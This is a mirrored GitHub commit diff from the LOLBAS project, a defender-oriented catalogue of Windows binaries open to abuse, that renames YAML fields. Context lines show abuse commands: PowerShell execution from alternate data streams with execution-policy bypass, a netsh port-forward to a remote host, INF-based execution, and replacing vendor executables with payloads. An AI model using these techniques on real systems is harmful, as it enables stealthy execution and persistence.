mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 14:59:03 +01:00
Major changes to Web portal - Small fixes to source files to adjust
This commit is contained in:
parent
2b77add5b4
commit
94368c1e69
@ -7,7 +7,7 @@ Commands:
|
|||||||
- Command: The command
|
- Command: The command
|
||||||
Description: Description of the command
|
Description: Description of the command
|
||||||
Usecase: A description of the usecase
|
Usecase: A description of the usecase
|
||||||
Category: Execution
|
Category: Execute
|
||||||
Privileges: Required privs
|
Privileges: Required privs
|
||||||
MitreID: T1055
|
MitreID: T1055
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1055
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1055
|
||||||
@ -15,15 +15,15 @@ Commands:
|
|||||||
- Command: The second command
|
- Command: The second command
|
||||||
Description: Description of the second command
|
Description: Description of the second command
|
||||||
Usecase: A description of the usecase
|
Usecase: A description of the usecase
|
||||||
Category: AWL-Bypass
|
Category: AWL Bypass
|
||||||
Privileges: Required privs
|
Privileges: Required privs
|
||||||
MitreID: T1033
|
MitreID: T1033
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1033
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1033
|
||||||
OperatingSystem: Windows 10 All
|
OperatingSystem: Windows 10 All
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\bin.exe
|
- Path: c:\windows\system32\bin.exe
|
||||||
- Path: c:\windows\syswow64\bin.exe
|
- Path: c:\windows\syswow64\bin.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: http://url.com/git.txt
|
- Code: http://url.com/git.txt
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Event ID 10
|
- IOC: Event ID 10
|
||||||
|
@ -7,10 +7,10 @@ Categories: []
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: explorer.exe calc.exe
|
- Command: explorer.exe calc.exe
|
||||||
Description: 'Executes calc.exe as a subprocess of explorer.exe.'
|
Description: 'Executes calc.exe as a subprocess of explorer.exe.'
|
||||||
Full Path:
|
Full_Path:
|
||||||
- c:\windows\explorer.exe
|
- c:\windows\explorer.exe
|
||||||
- c:\windows\sysWOW64\explorer.exe
|
- c:\windows\sysWOW64\explorer.exe
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/bohops/status/986984122563391488
|
- https://twitter.com/bohops/status/986984122563391488
|
||||||
|
@ -13,10 +13,10 @@ Commands:
|
|||||||
Description: Load (execute) NetSh.exe helper DLL file.
|
Description: Load (execute) NetSh.exe helper DLL file.
|
||||||
- Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
|
- Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
|
||||||
Description: Forward traffic from the listening address and proxy to a remote system.
|
Description: Forward traffic from the listening address and proxy to a remote system.
|
||||||
Full Path:
|
Full_Path:
|
||||||
- C:\Windows\System32
|
- C:\Windows\System32
|
||||||
- C:\Windows\SysWOW64
|
- C:\Windows\SysWOW64
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
||||||
|
@ -7,9 +7,9 @@ Categories: []
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
|
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
|
||||||
Description: ''
|
Description: ''
|
||||||
Full Path:
|
Full_Path:
|
||||||
- c:\windows\system32\nltest.exe
|
- c:\windows\system32\nltest.exe
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/sysopfb/status/986799053668139009
|
- https://twitter.com/sysopfb/status/986799053668139009
|
||||||
|
@ -9,10 +9,10 @@ Commands:
|
|||||||
Description: Opens the target file with the default application.
|
Description: Opens the target file with the default application.
|
||||||
- Command: OpenWith.exe /c C:\testing.msi
|
- Command: OpenWith.exe /c C:\testing.msi
|
||||||
Description: Opens the target file with the default application.
|
Description: Opens the target file with the default application.
|
||||||
Full Path:
|
Full_Path:
|
||||||
- c:\windows\system32\Openwith.exe
|
- c:\windows\system32\Openwith.exe
|
||||||
- c:\windows\sysWOW64\Openwith.exe
|
- c:\windows\sysWOW64\Openwith.exe
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/harr0ey/status/991670870384021504
|
- https://twitter.com/harr0ey/status/991670870384021504
|
||||||
|
@ -7,10 +7,10 @@ Categories: []
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: powershell -ep bypass - < c:\temp:ttt
|
- Command: powershell -ep bypass - < c:\temp:ttt
|
||||||
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
|
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
|
||||||
Full Path:
|
Full_Path:
|
||||||
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
||||||
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/Moriarty_Meng/status/984380793383370752
|
- https://twitter.com/Moriarty_Meng/status/984380793383370752
|
||||||
|
@ -11,10 +11,10 @@ Commands:
|
|||||||
Description: Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.
|
Description: Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.
|
||||||
- Command: psr.exe /stop
|
- Command: psr.exe /stop
|
||||||
Description: Stop the Problem Step Recorder.
|
Description: Stop the Problem Step Recorder.
|
||||||
Full Path:
|
Full_Path:
|
||||||
- C:\Windows\System32\Psr.exe
|
- C:\Windows\System32\Psr.exe
|
||||||
- C:\Windows\SysWOW64\Psr.exe
|
- C:\Windows\SysWOW64\Psr.exe
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
||||||
|
@ -9,10 +9,10 @@ Commands:
|
|||||||
Description: Copy the entire contents of the SourceFolder to the DestFolder.
|
Description: Copy the entire contents of the SourceFolder to the DestFolder.
|
||||||
- Command: Robocopy.exe \\SERVER\SourceFolder C:\DestFolder
|
- Command: Robocopy.exe \\SERVER\SourceFolder C:\DestFolder
|
||||||
Description: Copy the entire contents of the SourceFolder to the DestFolder.
|
Description: Copy the entire contents of the SourceFolder to the DestFolder.
|
||||||
Full Path:
|
Full_Path:
|
||||||
- c:\windows\system32\binary.exe
|
- c:\windows\system32\binary.exe
|
||||||
- c:\windows\sysWOW64\binary.exe
|
- c:\windows\sysWOW64\binary.exe
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
|
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
|
||||||
|
@ -7,9 +7,9 @@ Categories: []
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
||||||
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
|
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
|
||||||
Full Path:
|
Full_Path:
|
||||||
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\
|
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/997997818362155008
|
- https://twitter.com/pabraeken/status/997997818362155008
|
||||||
|
@ -7,9 +7,9 @@ Categories: []
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
||||||
Description: Execute another command through gpup.exe (Notepad++ binary).
|
Description: Execute another command through gpup.exe (Notepad++ binary).
|
||||||
Full Path:
|
Full_Path:
|
||||||
- 'C:\Program Files (x86)\Notepad++\updater\gpup.exe '
|
- 'C:\Program Files (x86)\Notepad++\updater\gpup.exe '
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/997892519827558400
|
- https://twitter.com/pabraeken/status/997892519827558400
|
||||||
|
@ -7,9 +7,9 @@ Categories: []
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||||
Description: Run PowerShell via LotusNotes.
|
Description: Run PowerShell via LotusNotes.
|
||||||
Full Path:
|
Full_Path:
|
||||||
- C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe
|
- C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||||
|
@ -7,9 +7,9 @@ Categories: []
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||||
Description: Run PowerShell via LotusNotes.
|
Description: Run PowerShell via LotusNotes.
|
||||||
Full Path:
|
Full_Path:
|
||||||
- C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
|
- C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||||
|
@ -17,9 +17,9 @@ Commands:
|
|||||||
Description: Kill a process.
|
Description: Kill a process.
|
||||||
- Command: Nvudisp.exe Run foo
|
- Command: Nvudisp.exe Run foo
|
||||||
Description: Run process
|
Description: Run process
|
||||||
Full Path:
|
Full_Path:
|
||||||
- C:\windows\system32\nvuDisp.exe
|
- C:\windows\system32\nvuDisp.exe
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
|
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
|
||||||
|
@ -17,9 +17,9 @@ Commands:
|
|||||||
Description: Kill a process.
|
Description: Kill a process.
|
||||||
- Command: nvuhda6.exe Run foo
|
- Command: nvuhda6.exe Run foo
|
||||||
Description: Run process
|
Description: Run process
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Missing
|
- Missing
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
|
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
|
||||||
|
@ -7,9 +7,9 @@ Categories: []
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
||||||
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
|
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
|
||||||
Full Path:
|
Full_Path:
|
||||||
- C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\
|
- C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/994213164484001793
|
- https://twitter.com/pabraeken/status/994213164484001793
|
||||||
|
@ -7,9 +7,9 @@ Categories: []
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: Run Setup.exe
|
- Command: Run Setup.exe
|
||||||
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
|
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
|
||||||
Full Path:
|
Full_Path:
|
||||||
- C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315
|
- C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/994381620588236800
|
- https://twitter.com/pabraeken/status/994381620588236800
|
||||||
|
@ -7,9 +7,9 @@ Categories: []
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
||||||
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
|
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
|
||||||
Full Path:
|
Full_Path:
|
||||||
- C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe
|
- C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/993514357807108096
|
- https://twitter.com/pabraeken/status/993514357807108096
|
||||||
|
@ -7,9 +7,9 @@ Categories: []
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
||||||
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
|
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
|
||||||
Full Path:
|
Full_Path:
|
||||||
- C:\Program Files\Oracle\VirtualBox Guest Additions
|
- C:\Program Files\Oracle\VirtualBox Guest Additions
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/pabraeken/status/993497996179492864
|
- https://twitter.com/pabraeken/status/993497996179492864
|
||||||
|
@ -12,9 +12,9 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MItreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -18,9 +18,9 @@ Commands:
|
|||||||
MitreID: T1064
|
MitreID: T1064
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full_Path:
|
||||||
- c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)
|
- c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)
|
||||||
Code Sample: []
|
Code_Sample: []
|
||||||
Detection: []
|
Detection: []
|
||||||
Resources:
|
Resources:
|
||||||
- https://twitter.com/bohops/status/993314069116485632
|
- https://twitter.com/bohops/status/993314069116485632
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Atbroker.exe
|
- Path: C:\Windows\System32\Atbroker.exe
|
||||||
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\bash.exe
|
- Path: C:\Windows\System32\bash.exe
|
||||||
- Path: C:\Windows\SysWOW64\bash.exe
|
- Path: C:\Windows\SysWOW64\bash.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Child process from bash.exe
|
- IOC: Child process from bash.exe
|
||||||
|
@ -36,10 +36,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\bitsadmin.exe
|
- Path: C:\Windows\System32\bitsadmin.exe
|
||||||
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Child process from bitsadmin.exe
|
- IOC: Child process from bitsadmin.exe
|
||||||
|
@ -36,10 +36,10 @@ Commands:
|
|||||||
MitreID: T1140
|
MitreID: T1140
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\certutil.exe
|
- Path: C:\Windows\System32\certutil.exe
|
||||||
- Path: C:\Windows\SysWOW64\certutil.exe
|
- Path: C:\Windows\SysWOW64\certutil.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Certutil.exe creating new files on disk
|
- IOC: Certutil.exe creating new files on disk
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1078
|
MitreID: T1078
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1078
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1078
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmdkey.exe
|
- Path: C:\Windows\System32\cmdkey.exe
|
||||||
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Usage of this command could be an IOC
|
- IOC: Usage of this command could be an IOC
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1191
|
MitreID: T1191
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cmstp.exe
|
- Path: C:\Windows\System32\cmstp.exe
|
||||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
|
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1196
|
MitreID: T1196
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1196
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1196
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\control.exe
|
- Path: C:\Windows\System32\control.exe
|
||||||
- Path: C:\Windows\SysWOW64\control.exe
|
- Path: C:\Windows\SysWOW64\control.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Control.exe executing files from alternate data streams.
|
- IOC: Control.exe executing files from alternate data streams.
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\cscript.exe
|
- Path: C:\Windows\System32\cscript.exe
|
||||||
- Path: C:\Windows\SysWOW64\cscript.exe
|
- Path: C:\Windows\SysWOW64\cscript.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Cscript.exe executing files from alternate data streams
|
- IOC: Cscript.exe executing files from alternate data streams
|
||||||
|
@ -12,12 +12,12 @@ Commands:
|
|||||||
MitreID: T1127
|
MitreID: T1127
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1003
|
MitreID: T1003
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||||
OperatingSystem: Windows server
|
OperatingSystem: Windows server
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\diskshadow.exe
|
- Path: C:\Windows\System32\diskshadow.exe
|
||||||
- Path: C:\Windows\SysWOW64\diskshadow.exe
|
- Path: C:\Windows\SysWOW64\diskshadow.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Child process from diskshadow.exe
|
- IOC: Child process from diskshadow.exe
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1035
|
MitreID: T1035
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1035
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1035
|
||||||
OperatingSystem: Windows server
|
OperatingSystem: Windows server
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Dnscmd.exe
|
- Path: C:\Windows\System32\Dnscmd.exe
|
||||||
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Dnscmd.exe loading dll from UNC path
|
- IOC: Dnscmd.exe loading dll from UNC path
|
||||||
|
@ -44,10 +44,10 @@ Commands:
|
|||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\esentutl.exe
|
- Path: C:\Windows\System32\esentutl.exe
|
||||||
- Path: C:\Windows\SysWOW64\esentutl.exe
|
- Path: C:\Windows\SysWOW64\esentutl.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -28,10 +28,10 @@ Commands:
|
|||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
